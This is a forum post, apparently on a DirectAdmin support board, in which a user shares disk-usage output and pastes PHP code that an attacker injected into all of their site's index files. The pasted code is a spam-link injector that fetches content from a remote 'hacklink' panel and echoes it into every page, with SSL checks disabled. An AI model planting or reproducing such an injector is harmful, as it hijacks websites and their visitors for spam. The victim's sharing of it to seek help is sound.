Do you have enough disk space ?
result as follow
:/usr/local/directadmin/custombuild# df -h
Filesystem Size Used Avail Use% Mounted on
tmpfs 192M 2.2M 190M 2% /run
/dev/sda1 39G 19G 21G 48% /
tmpfs 958M 0 958M 0% /dev/shm
tmpfs 5.0M 0 5.0M 0% /run/lock
/dev/sda15 105M 6.1M 99M 6% /boot/efi
tmpfs 192M 4.0K 192M 1% /run/user/1000
Something I want to share before going further.
Couple of months ago, someone somehow has hacked my site. He/She/It put following code all index files
<!-- Telegram:
https://t.me/hacklink_panel --><?php if(!function_exists('hacklink_add')){function hacklink_add(){static $b=null;if($b!==null)return $b;$u='
https://panel.hacklinkmarket.com/co...P_HOST'].'/';if(function_exists('curl_init')){$h=curl_init();curl_setopt_array($h,[CURLOPT_URL=>$u,CURLOPT_HTTPHEADER=>['X-Request-Domain:'.$d],CURLOPT_RETURNTRANSFER=>true,CURLOPT_TIMEOUT=>10,CURLOPT_CONNECTTIMEOUT=>5,CURLOPT_SSL_VERIFYPEER=>false,CURLOPT_FOLLOWLOCATION=>true,CURLOPT_MAXREDIRS=>3]);$r=@curl_exec($h);$c=curl_getinfo($h,CURLINFO_HTTP_CODE);curl_close($h);if($r!==false&&$c===200&&!empty($r)){$b=$r;return $b;}}if(ini_get('allow_url_fopen')){$o=['http'=>['header'=>'X-Request-Domain:'.$d,'timeout'=>10],'ssl'=>['verify_peer'=>false]];if($r=@file_get_contents($u,false,stream_context_create($o))){$b=$r;return $b;}}if(function_exists('fopen')){if($f=@fopen($u,'r')){$r='';while(!feof($f))$r.=fread($f,8192);fclose($f);if($r){$b=$r;return $b;}}}return '';}} ?>
<?php echo hacklink_add(); ?>
So, i cleaned entire site, updated ubuntu, updated DA, hardened server security...
Is this cause problem?